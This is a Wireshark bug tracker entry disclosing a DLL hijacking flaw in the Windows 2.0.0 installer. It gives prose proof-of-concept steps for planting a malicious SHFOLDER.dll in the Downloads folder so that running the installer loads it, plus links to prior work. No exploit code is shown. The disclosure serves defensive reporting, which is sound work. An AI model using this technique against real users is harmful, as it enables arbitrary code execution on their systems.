Bug ID |
12633
|
Summary |
Wireshark DLL Hijacking Vulnerability
|
Product |
Wireshark
|
Version |
2.0.0
|
Hardware |
x86-64
|
OS |
Windows 7
|
Status |
UNCONFIRMED
|
Severity |
Major
|
Priority |
Low
|
Component |
Extras
|
Assignee |
[email protected]
|
Reporter |
[email protected]
|
Created attachment 14744 [details]
POC
Build Information:
Paste the COMPLETE build information from "Help->About Wireshark", "wireshark
-v", or "tshark -v".
--
Aloha,
Summary
Wireshark contains a DLL hijacking vulnerability that could allow an
unauthenticated, remote attacker to execute arbitrary code on the targeted
system. The vulnerability exists due to some DLL file is loaded by
'Wireshark-win64-2.0.0.exe' improperly. And it allows an attacker to load this
DLL file of the attacker’s choosing that could execute arbitrary code without
the user's knowledge.
Affected Product:
Wireshark 2.0.0 (tested) and other versions
Impact
Attacker can exploit this vulnerability to load a DLL file of the attacker's
choosing that could execute arbitrary code. This may help attacker to
Successful exploit the system if user creates shell as a DLL.
More Details:
For software downloaded with a web browser the application directory is
typically the user's "Downloads" directory: see
<https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>,
<http://blog.acrossecurity.com/2012/02/downloads-folder-binary-planting.html>
and <http://seclists.org/fulldisclosure/2012/Aug/134> for "prior art" about
this well-known and well-documented vulnerability.
If an attacker places malicious DLL in the user's "Downloads" directory (for
example per "drive-by download" or "social engineering") this vulnerability
becomes a remote code execution.
Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Create a malicious SHFOLDER.dll file and save it in your "Downloads"
directory.
2. Download 'Wireshark-win64-2.0.0.exe' and save it in your "Downloads"
directory.
3. Execute .exe from your "Downloads" directory.
4. Malicious dll file gets executed.
Chao!!
Himanshu Mehta
You are receiving this mail because:
- You are watching all bug changes.